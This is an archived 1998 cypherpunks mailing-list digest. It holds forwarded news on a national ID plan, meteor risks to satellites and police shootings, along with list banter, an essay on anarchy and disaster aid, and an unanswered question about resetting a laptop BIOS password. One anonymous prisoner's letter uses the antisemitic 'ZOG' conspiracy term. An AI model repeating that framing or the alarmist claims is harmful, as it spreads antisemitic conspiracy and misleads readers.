of Privacy Issues" (ISPI). To receive "ISPI Clips" on a regular bases
(up to 3 - 8 clips per day) send the following message  "Please
enter [Your Name] into the ISPI Clips list: [Your e-mail address]" to:
ISPIClips@ama-gi.com  .

The Institute for the Study of Privacy Issues (ISPI) is a small
contributor-funded organization based in Victoria, British Columbia
(Canada). ISPI operates on a not-for-profit basis, accepts no
government funding and takes a global perspective.

ISPI's mandate is to conduct & promote interdisciplinary research
into electronic, personal and  financial privacy with a view toward
helping ordinary people understand the degree of privacy they have
with respect to government, industry and each other and to likewise
inform them about techniques to enhance their privacy.

But, none of this can be accomplished without your kind and
generous financial support. If you are concerned about the erosion
of your privacy in general, won't you please help us continue this
important work by becoming an "ISPI Supporter" or by taking out
an institute Membership?

We gratefully accept all contributions:

  Less than $60    ISPI Supporter
          $60 - $99    Primary ISPI Membership (1 year)
      $100 - $300    Senior ISPI Membership (2 years)
More than $300    Executive Council Membership (life)

Your ISPI "membership" contribution entitles you to receive "The ISPI
Privacy Reporter" (our bi-monthly 12 page hard-copy newsletter in
multi-contributor format) for the duration of your membership.

For a contribution form with postal instructions please send the following
message "ISPI Contribution Form" to ISPI4Privacy@ama-gi.com .

We maintain a strict privacy policy. Any information you divulge to ISPI
is kept in strict confidence. It will not be sold, lent or given away to
any third party.













****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Nov 1998 11:10:27 +0800
To: cypherpunks@cyberpass.net
Subject: IP: [FP] Governors push national ID plan - WND
Message-ID: <199811160253.SAA01034@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: "ScanThisNews" <mcdonalds@airnet.net>
Subject: IP: [FP] Governors push national ID plan - WND
Date: Fri, 13 Nov 1998 07:44:40 -0600
To: ignition-point@majordomo.pobox.com


SCAN THIS NEWS

FRIDAY
NOVEMBER 13, 1998

[excerpts from:]
Governors push national ID plan
Rewrite of executive order could be key

http://www.worldnetdaily.com/bluesky_exnews/19981113_xex_governors_pu.shtml

 By David M. Bresnahan
 Copyright 1998 WorldNetDaily.com

The National Governors Association would like to have a national ID system,
and plans to work with the White House to reinstate Executive Order 13083 to
make that a reality.

The bipartisan NGA is claiming much of the credit for stopping Executive
Order 13083, but they also plan to help craft a revised version of the order
that will alter the relationship between states and the federal government.

An internal document used by the NGA to inform all governors of their goals
and objectives was made available to WorldNetDaily, along with a "Fact Sheet
on Federalism" used by the White House staff. Both documents were provided
by a Republican source.

Each document shows that both the White House, and the nation's Governors,
plan to put the currently suspended executive order into effect.

 [snip]

"This is because of demands by citizens, businesses, and the federal
government to make all government more accessible and open," claims the NGA.
"Pressures for uniformity and simplification come from globalization in
trade and telecommunications policy, regional environmental quality
solutions, and a greater need for some type of personal identification
mechanism to combat fraud, crime, illegal immigration, and mismanagement of
funds.

 [snip]

Congress passed the "Illegal Immigration Reform and Immigrant Responsibility
Act of 1996," which authorized the National Highway Traffic Safety
Administration of the Department of Transportation to establish a national
ID system through the use of driver's licenses. Those guidelines are spelled
out in Section 656 (b) of the act. They include the use of Social Security
numbers on all licenses, and in all data bases beginning Oct. 1, 2000.

The act also calls for digitized biometric information to be a part of each
license, or "smart card." The biometric information will include
fingerprints, retina scans, DNA prints, and other similar information.

Thousands of letters of protest were received by the Department of
Transportation during a public comment period, which concluded in October.
The exposure of the plan in WorldNetDaily, and the outcry that followed,
prompted Congress to place a moratorium on the national ID, as well as the
medical ID law.

 [snip]

Congress included three clauses in the omnibus appropriations bill to
withhold funds for implementation of the national ID, medical ID and
Executive Order 13083. Apparently the governors are not pleased with those
actions, according to their document.

 [snip]

The documents obtained by WorldNetDaily clearly show that the NGA would like
to facilitate a national ID system, and the organization believes Executive
Order 13083, with some revisions, is needed to facilitate that.

------------------------------------------
David M. Bresnahan (David@talkusa.com) is a contributing editor of
WorldNetDaily.com, is the author of "Cover Up: The Art and Science of
Political Deception," and offers a monthly newsletter "Talk USA
Investigative Reports."

David M. Bresnahan - Investigative Journalist
P.O. Box 1168, West Jordan, UT 84084-7168
off: (801) 562-5362
fax: (801) 562-1341
book orders: 800-338-8824
website: http://talkusa.com
e-mail: david@talkusa.com
------------------------------------------

For more on the NGA, go to their web page at:

http://www.nga.org/

where you'll find articles on such tipics as:

"o Voice of the Governors: 50 States Surge Past Deadline To Extend Children'
s Health

"o News: Governors Report on Legislative Record and Condition of the
Federal-State Partnership

"o Policy Forum: New Flexibility, New Opportunities: Strengthening
State-Local Workforce Systems Using the Workforce Investment Act

[Thanks to Jim Groom for the article link]
=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Nov 1998 11:10:44 +0800
To: cypherpunks@cyberpass.net
Subject: IP: U.S. Must Re-Think Strategy to Counter WMD Threat
Message-ID: <199811160253.SAA01045@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: U.S. Must Re-Think Strategy to Counter WMD Threat
Date: Fri, 13 Nov 1998 14:14:50 -0600
To: believer@telepath.com

Source:  US Newswire
http://www.usnewswire.com/topnews/Current_Releases/1113-110.txt

Weapons Expert: U.S. Must Re-Think Military Strategy 
U.S. Newswire
13 Nov 11:04

 Weapons Expert: U.S. Must Re-Think Military Strategy to Counter Weapons of
Mass Destruction Threat
 To: National Desk
 Contact: Paige McMahon, 301-320-8053.

   WASHINGTON, Nov. 13 /U.S. Newswire/ -- The United States
must devise a military force structure that makes possible
a rapid response to future crises involving the manufacture and use
of weapons of mass destruction (WMD), according to Dr. Robert W.
Chandler, an expert in the strategic use of WMD and author of the
just-published The New Face of War (AMCODA).

   "The U.S. military mindset is rooted in conventional warfighting
tactics," said Chandler, a retired U.S. Air Force colonel and former
NATO advisor. "While we're waiting for carriers to get in position
and making sure our fighters have a place to park, Iraq is working
feverishly to hide and disperse the targets, which are the labs and
equipment they use to manufacture biological and chemical weapons. At
this moment, they're unbolting machinery and moving it to sheds, to
civilian residential areas, and out into the desert. By the time we
get around to bombing the factories, they will be empty."

   "Wouldn't it be nice to destroy their weapons of mass destruction
before they are hidden? Targets are perishable, like vegetables and
fruit. If you wait too long to destroy them, by the time you hit the
target it's rotten. That is to say, they've been altered to the point
where they have little or no value," said Chandler, who predicted
Iraq's intent to use weapons of mass destruction to alter the balance
of power in the region in his first book, Tomorrow's War, Today's
Decisions (AMCODA, 1996).

   "Absent a U.S. ability to strike quickly and deliberately, we have
no choice but Saddam's current game, where he plays the Roadrunner
and we are the wiley coyote," Chandler said. "Saddam Hussein sees
peace with U.N. weapons inspections as a losing proposition. From his
perspective, the only chance to end the hated weapons inspections and
end the U.N.'s economic sanctions is to force his countrymen to
endure another bombing in the anticipation that it will satisfy world
opinion, and lead to the lifting of sanctions. Dictators like Saddam
Hussein need to pay off those who keep them in power military,
police, and other elites with economic rewards. The sanctions cut
into that ability and weaken his grip.

   "The U.S. must create a Global Reconnaissance and Strike
Complex to develop the military strategy and fighting forces
necessary to meet the challenges of WMD proliferation. We must
mass firepower, not forces, and we must make time work to our
advantage."

   ------
   Dr. Chandler lives and works in McLean, Va., and is available for
broadcast and print interviews.  You may contact Chandler directly
at his office, 703-356-6927 (evenings/weekends: 703-883-0324).
For more information, contact Paige McMahon, 301-320-8053.

 -0-
 /U.S. Newswire  202-347-2770/
 11/13 11:04

Copyright 1998, U.S. Newswire
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Mon, 16 Nov 1998 11:11:59 +0800
To: cypherpunks@cyberpass.net
Subject: IP: Meteorites swarming toward us
Message-ID: <199811160253.SAA01056@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: Meteorites swarming toward us
Date: Sat, 14 Nov 1998 11:35:17 -0600
To: believer@telepath.com

Source:  Connecticut Post
http://www.connpost.com/local3.html

 Meteorites swarming toward us 

 Saturday, November 14, 1998

 By MARIAN GAIL BROWN
 Staff writer 

 Early next week you might switch on your television only to be greeted by
a big blank screen. When you pick up the phone to blast the place that sold
you the thing, the line is dead. 

 You get in your car to return that worthless object. You want the quickest
route, so you hit a switch that displays a map, using a global positioning
satellite, to direct you. 

 Nothing happens. 

 Is this Armageddon? Have aliens from outer space finally taken over? Well,
the truth is out there. ... Cue the X-Files music. ... It's the peak of the
Leonid meteor storm, arriving in our hemisphere early Tuesday and
astronomers say it promises to be this millennium's last great pyrotechnic
pageant in space . 

 Thousands of meteors -remnants of comet Temple-Tuttle - will bombard upper
levels of the Earth's atmosphere. While these shooting stars are expected
to put on quite a light show, there is a down side. The meteors are the
single greatest natural threat to 500-plus Earth-orbiting satellites. And
some scientists say they could play havoc with satellites that deal with
communication, navigation and spy technology. When the last major Leonid
meteor shower took place in 1966, there were only a handful of satellites
in space. 

 Some 350 of the 500-plus orbiting satellites have a 5 percent chance of
being struck by meteors or knocked out of service, according to projections. 

 "It's like firing a thin shotgun blast into a really big flock of geese,"
says Ernie Hildner, director of the Space Environment Center, a division of
the National Oceanic and Atmospheric Administration that provides weather
reports on space. "Everyone knows some of them are going to get killed or
hurt. It's just a matter of waiting and seeing because we know it's going
to happen, but we don't know which satellites it will affect." 

 With plans by government and commercial industry to launch 1,200
additional satellites within the next 10 years, "space is definitely
getting crowded," says Greg Hughes, a spokesman for The Aerospace Corp. The
company, based in El Segundo, Calif., provides primary engineering,
oversight and scientific expertise for all Department of Defense space
launches. "And there's supposed to be another meteor shower next November.
So, the question is: will this factor into satellite launches? We hope it
will, because space is gradually becoming more crowded and the next time a
major Leonid shower comes around in another 33 years, we may not be so
lucky." 

 To protect their multibillion- dollar investment in space, satellite
owners have tilted many of their satellites so their solar panels don't
take a direct hit. For instance, the Hubble telescope, made in Connecticut,
will be shifted so that it faces away from the meteor showers. 

 "The satellites that are up there are changing their orientation,
especially if they have sensitive instrumentation," says Russell Patera,
senior engineering specialist with the Center for Orbital Re-entry and
Debris Studies. "That means that these satellites will be facing with their
edges out. So, that if they are hit, hopefully, it will only be a glancing
blow." 

 More troublesome than a direct hit, perhaps, is the damage the space
debris from comet Temple- Tuttle does. 

 "It can vaporize into a thin plasma that short-circuits the electrical
impulses of a satellite," Patera says, adding that such a disturbance also
could knock out satellite transmissions. 

 And what happens in the minutes after such an event could be critical to
whether a satellite can be repaired, Patera says. "That's why satellite
engineers everywhere will be constantly on call to protect their company's
investments. There has already been a lot of pre-planning as to what to do
[in a worst-case scenario], he says. "But everybody will be on the alert." 

 The particles, burned off from comet Temple-Tuttle's 33-year orbit around
the sun, will drizzle down on any spacecraft or satellites orbiting high up
in Earth's atmosphere as close as 200 to 24,000 miles from Earth. 

 Instead of seeing a smattering of meteors or, as they are more commonly
known, shooting stars, stargazers in some parts of the world could see as
many as 200 to 5,000 an hour, a veritable galactic fireworks display. The
best viewing will be in Asia for this shower. 

 For his part, Bob Crelin, 39, a graphic designer from Branford, is looking
forward to the shooting-star show. 

 "All you need is a blanket, some heavy clothes, something warm to drink
and a really dark sky, away from the city lights," says Crelin of the
Astronomical Society of New Haven. 

 "It's best viewed without a telescope or binoculars because meteor showers
occur across a vast distance. So you want to be able to see the whole sky,
not an isolated part of it," Crelin says. "That's the best way to
appreciate a shooting star, seeing it streak across the horizon." 

 Crelin recalls the excitement of seeing a Perseid meteor shower as a child
growing up in the 1960s as though it were yesterday. 

 "I was on Cape Cod with my parents and we were driving back from someplace
for dinner," Crelin says. "I looked out [of the window] and it was like
literally raining stars all around us. They were streaking across the sky.
And I remember thinking that this was some kind of giant fireworks show at
first because this was the summer. I was just totally jazzed." 

 Perhaps, that's what fuels his interest in astronomy. These days, Crelin
owns four telescopes, some so powerful that they enable him to see beyond
the Milky Way and our own galaxy. 

 "I have one that lets me see things that are 50 million light years away,"
says Crelin, adding that for the Leonid shower he will take his own advice
and leave all his telescopes at home. 

 For his part, Michael Dzubaty, a medical office manager from West Haven,
plans to camp out in a nearby park from midnight to about dawn. 

 "This is the peak part of the Leonid period, which occurs only once every
33 years. Usually, what happens is you have a double shot of intense meteor
showers" in two consecutive Novembers, Dzubaty says. No one is really sure
whether this year's Leonid shower will be better than the 1999 one. "So,
you don't want to take any chances missing either of them." 

 But if you've seen one batch of shooting stars haven't you seen them all?
"It's hard to put into words, but nah," says the 51-year-old amateur
astronomer. "Imagine a series of shooting stars and then every once in a
while a colossal fire ball like from out of 'Deep Impact' or 'Armageddon.'" 

Connecticut Post
410 State Street
Bridgeport, CT 06604
203-330-6456 

(c) 1998 Connecticut Post.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------


****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 16 Nov 1998 02:52:34 +0800
To: cypherpunks@einstein.ssz.com
Subject: No Subject
Message-ID: <199811151830.TAA09841@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



9 Nov 98
Carl Johnson #05987-196
P.O. Box 4000, Springfield, Missouri 65801-4000

I thought that given the fact that The Kontrollers seem
to be Lying Out of Their Dirty Little AssHoles (TM) at every
turn, in regard to my incarceration and legal situation,
that I might as well use my time in Prison to improve my
knowledge of Law & Politics.

I am assuming that The Usual (TM) legal defenses are not
an option for me, since my Public <hee-hee> <snortle-
snortle> <hack-hack> Defender <spit> <fart> seems to be 
too ashamed of his role in my Legal Case that he has not 
once contacted me.

Perhaps it would be best for me to study the possibility 
of presenting an SOG-Z0G AmericaLand of the The Freeh 
Defense (TM).

If you know of any Cpunx Shit Disturbers who are familiar
with Zionist Occupational Government concepts literature 
and legal defense histories, I would be happy to study 
whatever material they could send me.

(Information from The Flat Earth Society would also
come in handy, to prepare a Back Up Defense, eh?)

Tell Zog that Chuck and Squeaky say, "High!"

CJ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 16 Nov 1998 09:04:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Could E.M. Cordian be Matt Blaze in Disguise? (Nah!)
In-Reply-To: <Pine.BSF.3.91.981115132212.17485C-100000@mcfeely.bsfs.org>
Message-ID: <199811160044.TAA15729@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Robert Hettinga wrote:

>I fixed my problem with Mr. McLellan this morning, though. Mr. McLellan can
>crusade against threats to his world view on someone else's list, I figure.

Ye gods, Robert, what'd you do to Vin, told TRW the facts of his Ponzi,
sent his name to the IRS assassin bot with e-$3, broadcast his secret key,
revealed his criminal nyms, told his deadbeat kids where he really hides, 
scrambled his biometrics so he'd never access offshore stashes, 
crayoned his sweetie's moniker, skills and number on John Glenn's
overalls, or merely plonked, readied, aimed as is the privilege of 
demigodish ganglia atwitching.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 16 Nov 1998 02:57:23 +0800
To: cypherpunks@cyberpass.net
Subject: Re: DES Trolls
In-Reply-To: <199811151736.LAA28829@wire.insync.net>
Message-ID: <199811151841.TAA10404@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>>>>> "Mr. Roug" == Eric Cordian <emc@wire.insync.net> burbled:

  > Continued such antics will be met with an appropriate legal response.

All together now.  "Bwahahahahahahhahaahah!" ;-)

-- BobMonger ;-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 16 Nov 1998 10:16:55 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: update.402 (fwd)
Message-ID: <199811160146.TAA08818@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 13 Nov 1998 14:04:23 -0500 (EST)
> From: physnews@aip.org (AIP listserver)
> Subject: update.402

> PHYSICS NEWS UPDATE                         
> The American Institute of Physics Bulletin of Physics News
> Number 402  November 13, 1998   by Phillip F. Schewe and Ben
> Stein
> 
> IMMISCIBLE QUANTUM LIQUIDS.  The wavelike overlap of
> cooled alkali atoms known as Bose Einstein condensation (BEC)
> represents a new form of condensed matter in which physicists can
> pursue studies of fluid dynamics, sound propagation, persistent
> currents, and many of the coherence phenomena occurring in other
> "super" states such as superfluids and superconductors. One notable
> BEC innovation introduced in the past year by Wolfgang Ketterle
> and his colleagues at MIT was the development of an all-optical trap
> (Update 362)  which can hold condensate atoms in a number of
> distinct (hyperfine) internal states.  And just as helium-3 (which has
> a magnetic substructure) is a more complex superfluid than
> nonmagnetic helium-4, so the multi-component MIT condensate
> ought to exhibit behavior not seen in single-component BEC. 
> Indeed, at the New Horizons in Science meeting in Boston last week
> Ketterle reported that when he immersed his BEC in a uniform
> magnetic field and a stream of radio waves, those portions of the
> condensate in different hyperfine states (m=0 and m=1) quickly
> segregated themselves into alternating domains (differing in energies
> equivalent to only a few nanokelvins) as if they were oil and
> vinegar. Furthermore, these layers unexpectedly persist; in effect
> this arrangement of the condensate constitutes a metastable
> macroscopically occupied excited state.

> THE ARROW OF TIME has been directly measured by two groups
> of physicists, one at CERN in Geneva
> (www.cern.ch/cplear/Welcome.html) and one at Fermilab
> (http://fnphyx-www.fnal.gov/experiments/ktev/ktev.html) near
> Chicago.  Time reversal (T) is one of those symmetries, along with
> charge conjugation (or C, the operation which turns particles into
> antiparticles) and parity (or P, the reversal of a particle's
> coordinates from x,y,z to -x,-y,-z) that were once thought to be
> preserved in interactions at the atomic level.  But then experiments
> showed that P, C, and the combination CP were not sacred.  And
> since the triple symmetry of CPT is still thought to be valid, T by
> itself was thought to be vulnerable.  That is, it is not thought that
> physics does differentiate between the forward or backward
> movement of time.  The two groups have now seen evidence for this
> T violation in the observed decay rates for neutral K mesons. 
> (Science, 2 Oct.; Science News, 31 Oct.)

> SONIC BANDGAPS, frequency ranges in which sound waves are


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Mon, 16 Nov 1998 10:25:43 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Satellites Brace for Space Storm
Message-ID: <364F851E.DE3676C@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain


AP story explains the real reason for the latest showdown with Iraq; Satellite
damage from a brush with the lion's tail, the Leonid meteor storm. America's
satellite fleet, born under a bad sign, will be sprinkled with high velocity
fairy dust in the wake of Comet Tempel-Tuttle. Communications satellites
and GPS face the highest risk. The latest Persian Gulf skirmish is mentioned
a couple times.

Apparently the loss of UN monitors and star-crossed destiny was too
much for US security interests. With the loss of satellite services a remote
possibility, reestablishment of UN monitoring was paramount.

Residents of Baghdad will look at the starry display as a chilling reminder
of who controls their destiny.
 

Satellites Brace for Space Storm
By Paul Recer
AP Science Writer
http://www.washingtonpost.com/wp-srv/WPlate/1998-11/15/221l-111598-idx.html
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 16 Nov 1998 11:09:30 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Could E.M. Cordian be Matt Blaze in Disguise? (Nah!)
In-Reply-To: <v04020a0db274d064b246@[139.167.130.246]>
Message-ID: <v04020a1cb27541e9303d@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:34 PM -0500 on 11/15/98, John Young wrote:


> Ye gods, Robert, what'd you do to Vin, told TRW the facts of his Ponzi,
> sent his name to the IRS assassin bot with e-$3, broadcast his secret key,
> revealed his criminal nyms, told his deadbeat kids where he really hides,
> scrambled his biometrics so he'd never access offshore stashes,
> crayoned his sweetie's moniker, skills and number on John Glenn's
> overalls, or merely plonked, readied, aimed as is the privilege of
> demigodish ganglia atwitching.

 Bwahahahahah! (Or something like it, anyway...)


Nope. Nothing *that* serious. Something completely childish. He probably
won't even notice. ;-).

Cheers,
Bob Hettinga





-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 16 Nov 1998 15:44:37 +0800
To: cypherpunks@einstein.ssz.com
Subject: Re: Question about anarchic systems and natural disasters
In-Reply-To: <199811111339.OAA22865@replay.com>
Message-ID: <3.0.5.32.19981115231531.00955100@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Jim Choate writes:
>> What would be the responce of a anarchic system that was based on profit in
>> regards something like Mitch's impact on Ctl. America and their plea for
>> food and aid?

I see three aspects in which government affects disaster aid in this case.

0) Some of the aid is being given to Central American governments for
	distribution, rather than to private groups such as the Red Cross;
	presumably this is because they've got a known infrastructure,
	they're easy to find :-), they won't rip off too much of the money,
	and also some of the repair work is fixing roads that they own,
	If Central America were anarchist, the road money would go to
	road-maintenance companies or collectives, and the rest would
	probably be handled between by the Catholic Church and other
	international charities, plus by the local charities which would
	be bigger because they'd be doing jobs governments do know.

1) Real charities have to ask people for money to do good things, 
	while governments like the US's can just take and spend the money, 
	and tell their subjects that they should feel good about it,
	and in cases like this, most taxpayers won't mind too much,
	though it'd be nice if the Feds would buy a few less nukes in return.
	Rampant theft is a bad thing for the economy in the long term,
	but short-term incremental changes can be relatively efficient.
	Also, in an anarchist society, charities would generally keep
	a reasonable amount of money on hand for emergencies like this,
	larger than they do today, but smaller than governments' slush funds.

2) There is some synergy between the skills and equipment needed for
	disaster relief and those needed for military adventurism,
	like transportation equipment, strong people, and medical supplies,
	and if the military aren't busy killing people and breaking things,
	they've usually got the spare time to go transport food and
	medical supplies and build the occasional road or two.
	Even purely defensive military forces aren't directly
	contributing to society sitting around idle - even a
	peaceful anarchist society needs some protection against
	invaders, though there are more efficient and safer approaches than
	a standing army - and even though they'd be smaller,
	they can still be helpful.

	This synergy does occasionally pay off in other ways -
	policeman are awfully expensive resources to use for directing traffic,
	but if they're going to be walking a beat anyway to watch for
	Bad Guys and be available when citizens need them,
	street corners are a fine place to do it.  On the other hand,
	in a free society, the most common police functions are either
	not done (like drug wars) or done by the public (like stopping
	thieves on the street), and hired professionals can be used for
	higher-skilled activities, like detective work and bounty hunting.


Meanwhile, in an anarchy, people would have more money, because they 
wouldn't be wasting as much of society's resources on unnecessary 
government functions (though they'd still buy the ones they wanted),
and governments wouldn't be interfering with their businesses.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Mon, 16 Nov 1998 13:42:55 +0800
To: cypherpunks@cyberpass.net
Subject: Itchy Trigger-Fingers in DC
Message-ID: <3143d573c2c0be736c2caf37ceea9ff6@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



D.C. police top list of fatal
                  shootings 

                  'We shoot too often' 

                  November 15, 1998
                  Web posted at: 8:54 p.m. EST (0154 GMT) 

                  WASHINGTON (AP) -- Police in the
                  nation's capital fire their weapons at a rate
                  more than double those in New York, Los
                  Angeles, Chicago or Miami and kill a higher proportion of people than
                  comparable police forces elsewhere in the country. 

                  An investigation by The Washington Post showed that throughout the 1990s,
                  more people were killed by District of Columbia police officers per resident
                  than in any other large American city. 

                  "We shoot too often, and we shoot too much when we do shoot," Terrance
                  W. Gainer, the executive assistant police chief, told the newspaper. 

                  In the last five years, the Post said, Washington's officers fatally shot 57
                  people, three more than police in Chicago, where the police force is three
                  times as large and the population is five times larger. 

                  Deaths and injuries from police shootings have resulted in almost $8 million
                  in court settlements and judgments against the district in the last six months,
                  the report said. 

                  "The spate of police shootings in the district this decade is closely tied to the
                  training and supervision of officers and the way the department investigates
                  cases and holds officers accountable," the newspaper said. 

                  It said police shootings began to rise at the same time the department added
                  a large number of new, ill-prepared recruits and adopted the light-trigger,
                  highly advanced Glock 9 mm handgun as the department's service weapon. 

                  On the other side of the coin, eight district police officers were slain in
                  Washington from 1990 to 1997, a number the Post said was surpassed in
                  only a half-dozen other U.S. cities, each much bigger than the district. 

                  After meeting last week with Post reporters to discuss their findings, Police
                  Chief Charles Ramsey, who took office this year, tightened the department's
                  policy on using force. 

                  He also announced that in January, the department will begin additional
                  training for all officers in firearms and alternatives to the use of deadly force. 

                     Copyright 1998   The Associated Press. All rights reserved. This
                   material may not be published, broadcast, rewritten, or redistributed.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Mon, 16 Nov 1998 19:52:22 +0800
To: cypherpu <frantz@netcom.com>
Subject: RE: SIGH... NOT!! THC tainted oranges
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F858D@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



Closest ciommon relative of hemp is of course hop  (*Humulus lupulus*
IIRC) which is, as you all know, widely used to flavour beer. I believe
it already has  some THC content, or something very similar.

Ken Brown


Bill Frantz wrote:

> > always thought that crabgrass would be a better carrier for
> THC genes, and give the DEA maximum fits.  However, 
> given that 5 states have passed medical pot initiatives, 
> one over the attempts of their legislature to destroy the 
> previous initiative, perhaps the DEA has enough problems.  :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Mon, 16 Nov 1998 21:56:49 +0800
To: cypherpunks@toad.com
Subject: BIOS
Message-ID: <19981116133827.5746.rocketmail@send102.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



Anyone know how to reset a BIOS password on a Toshiba Satellite Pro
430CDT laptop?  Any input would be greatly appreciated.




==
Ogre bounces like sonar. . .Peace.
                  Ogre

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 16 Nov 1998 21:36:17 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Question about anarchic systems and natural disasters (fwd)
Message-ID: <199811161315.HAA10512@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 15 Nov 1998 23:15:31 -0800
> From: Bill Stewart <bill.stewart@pobox.com>
> Subject: Re: Question about anarchic systems and natural disasters

> >Jim Choate writes:
> >> What would be the responce of a anarchic system that was based on profit in
> >> regards something like Mitch's impact on Ctl. America and their plea for
> >> food and aid?
> 
> I see three aspects in which government affects disaster aid in this case.

[remainder deleted]

The question was how would an anarchic system work in this respect, not how
do governments, relief organizations, and the general public act now.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Mon, 16 Nov 1998 21:21:46 +0800
To: The Fedbait Mailing List <cypherpunks@toad.com>
Subject: BEATING THE TEMPEST
